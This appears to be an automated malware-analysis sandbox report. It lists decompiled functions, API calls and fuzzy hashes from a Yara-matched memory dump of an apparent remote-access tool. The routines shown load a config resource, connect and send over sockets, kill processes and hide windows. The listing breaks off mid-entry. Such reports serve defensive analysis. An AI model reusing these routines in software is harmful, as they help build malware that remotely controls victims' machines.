                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                  • String ID:
                                  • API String ID: 3382107156-0
                                  • Opcode ID: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction ID: b94a0025ee3120f282ce46cac819fd7ffee2fdf7fe7efc1014d8e4d368efe18d
                                  • Opcode Fuzzy Hash: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction Fuzzy Hash: E301DE72C0010DEBDB01DF94DC49EDEBB7CEB48304F108062F915E2150EB75A6898FA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409D02, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00409D02(void** _a4) {
				void* _t4;
				long _t5;
				struct HRSRC__* _t7;

				_t7 = FindResourceA(0, "SETTINGS", 0xa);
				_t4 = LockResource(LoadResource(0, _t7));
				_t5 = SizeofResource(0, _t7);
				 *_a4 = _t4;
				return _t5;
			}






                                  0x00409d16
                                  0x00409d22
                                  0x00409d2d
                                  0x00409d37
                                  0x00409d3b

                                  APIs
                                  • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                  • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID: SETTINGS
                                  • API String ID: 3473537107-594951305
                                  • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                  • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004032B3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040B522: RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.ADVAPI32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032DA
                                  • atoi.MSVCRT ref: 004032E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032ED
                                  Strings
                                  • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004032C1
                                  • CurrentBuildNumber, xrefs: 004032BC
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@CloseD@1@@OpenQueryValueatoi
                                  • String ID: CurrentBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 1453687294-3377751560
                                  • Opcode ID: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction ID: fd2564c0d0cdcb3147c4efd585e8939db476c869aa5c4bae27b80d41888a3fe0
                                  • Opcode Fuzzy Hash: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction Fuzzy Hash: FFE04F72A00618E7C700B7A8DC0AFEEB768EB44755F504479B922A21D2EA749518C69C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004126EF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 18threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004126EF(char _a4) {
				void* _t2;
				void* _t3;

				_t1 =  &_a4; // 0x40e322
				_t2 = GetCurrentProcess();
				_t3 = GetCurrentThread();
				return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2);
			}





                                  0x004126ff
                                  0x00412702
                                  0x00412705
                                  0x00412717

                                  APIs
                                  • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                  • GetCurrentThread.KERNEL32 ref: 00412705
                                  • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                  • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Current$Process$DuplicateHandleThread
                                  • String ID: "@
                                  • API String ID: 3566409357-445313631
                                  • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                  • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ACE6, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040AD26
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                    • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                    • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,00000000,00000000), ref: 00402186
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                    • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                    • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??4?$basic_string@Y?$basic_string@connectfreemallocrecvsocket
                                  • String ID:
                                  • API String ID: 901373779-0
                                  • Opcode ID: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                  • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                  • Opcode Fuzzy Hash: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                  • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405C62, Relevance: 7.5, APIs: 5, Instructions: 42synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00405C62(void* __ecx) {
				long _t7;
				void* _t10;
				void* _t18;
				void* _t19;

				_t18 = __ecx;
				_t7 = CreateEventA(0, 0, 0, 0);
				 *(_t18 + 0x34) = _t7;
				if( *((char*)(_t18 + 0x3d)) != 0) {
					_t10 = _t18 + 0x14;
					do {
						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664);
						if(_t7 != 0) {
							_t19 = _t19 - 0x10;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
							E004020C2(0x41be70, 0x5a, _t10);
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
						}
						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff);
					} while ( *((char*)(_t18 + 0x3d)) != 0);
				}
				return 1;
			}







                                  0x00405c6a
                                  0x00405c6d
                                  0x00405c77
                                  0x00405c7a
                                  0x00405c7c
                                  0x00405c84
                                  0x00405c86
                                  0x00405c90
                                  0x00405c92
                                  0x00405c98
                                  0x00405ca5
                                  0x00405cad
                                  0x00405cad
                                  0x00405cb8
                                  0x00405cbe
                                  0x00405c84
                                  0x00405cc9

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                  • String ID:
                                  • API String ID: 2456067102-0
                                  • Opcode ID: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                  • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                  • Opcode Fuzzy Hash: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                  • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412981, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 1435062097-0
                                  • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
                                  • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004050FC, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1622488342-0
                                  • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                  • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402526, Relevance: 7.5, APIs: 5, Instructions: 34networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 00402530
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 0040253F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • closesocket.WS2_32(00000000), ref: 0040256A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                  • String ID:
                                  • API String ID: 3330461409-0
                                  • Opcode ID: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                  • Opcode Fuzzy Hash: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D817, Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0040D817(void* __eflags) {
				char* _t8;
				void* _t25;

				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);
				E004126BC( *(_t25 - 0x2c));
				E0040EBBE();
				E004017DD(_t25 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                  0x0040d820
                                  0x0040d827
                                  0x0040d836
                                  0x0040d83f
                                  0x0040e51b
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                  • atoi.MSVCRT ref: 0040D82E
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                    • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                    • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                    • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                    • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                    • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                    • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                  • String ID:
                                  • API String ID: 2919580351-0
                                  • Opcode ID: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                  • Opcode Fuzzy Hash: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412100, Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                  • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,6B015DF8), ref: 00412140
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                  • String ID:
                                  • API String ID: 758954411-0
                                  • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                  • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D813, Relevance: 7.5, APIs: 5, Instructions: 26COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                  • Opcode Fuzzy Hash: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D80A, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
